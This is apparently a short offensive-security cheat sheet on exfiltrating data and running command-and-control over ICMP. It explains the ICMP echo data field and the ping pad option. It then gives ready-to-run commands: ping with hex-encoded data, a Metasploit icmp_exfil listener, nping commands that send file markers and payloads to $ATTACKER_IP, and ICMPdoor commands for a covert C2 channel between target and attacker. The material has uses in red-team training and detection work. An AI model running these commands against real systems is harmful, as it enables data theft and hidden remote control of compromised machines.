# ICMP Exfiltration * [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtm) * Type 0, which is Echo Reply contains an optional data field inside the header ``` 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Type | Code | Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identifier | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | + Data + | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ``` ## Usage * The `Pattern` parameter can be used to pad the bytes. From the manual ``` -p pattern You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones. ``` * Pad hex values ```sh ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p ) ``` ### Metasploit ICMP Exfiltration * Awaiting ICMP data on Attacker ```sh use auxiliary/server/icmp_exfil set BPF_FILTER icmp and not src $ATTACKER_IP set interface run ``` * Exfiltrating from target via `ping` shown above or use `nping` * Starting the transmission via `nping` and BOF ```sh sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt" sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload" sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF" ``` ### C2 over ICMP * Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor) * On target ```sh sudo icmpdoor -i -d $ATTACKER_IP ``` * On attacker ```sh sudo icmp-cnc -i -d $TARGET_IP ```